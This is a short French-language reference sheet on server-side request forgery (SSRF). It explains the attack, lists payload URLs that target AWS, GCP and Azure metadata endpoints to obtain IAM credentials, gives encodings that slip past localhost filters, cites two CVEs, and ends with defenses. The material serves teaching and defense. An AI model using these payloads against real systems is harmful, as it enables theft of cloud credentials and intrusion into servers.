SSRF — Forcer le serveur à faire des requêtes

OWASP A10 Cloud critique

Qu'est-ce que SSRF ?

SSRF force le serveur web à faire des requêtes vers des destinations choisies par l'attaquant. En cloud, le metadata endpoint (169.254.169.254) retourne les credentials IAM AWS/GCP/Azure.

Payloads

http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE  # AWS
http://metadata.google.internal/computeMetadata/v1/?recursive=true      # GCP
http://169.254.169.254/metadata/instance?api-version=2021-02-01         # Azure

# Bypass de filtres localhost
http://[::1]/admin
http://0177.0.0.1/
http://2130706433/
http://127.0.0.1.nip.io/

CVE

CVE-2024-21893 Ivanti SSRF pre-auth (CVSS 8.2) · CVE-2023-27163 request-baskets SSRF

Défenses

Whitelist stricte des domaines/IPs autorisés · Bloquer RFC1918 et 169.254.x · Valider le schéma URL · Firewall egress · Sur AWS : utiliser IMDSv2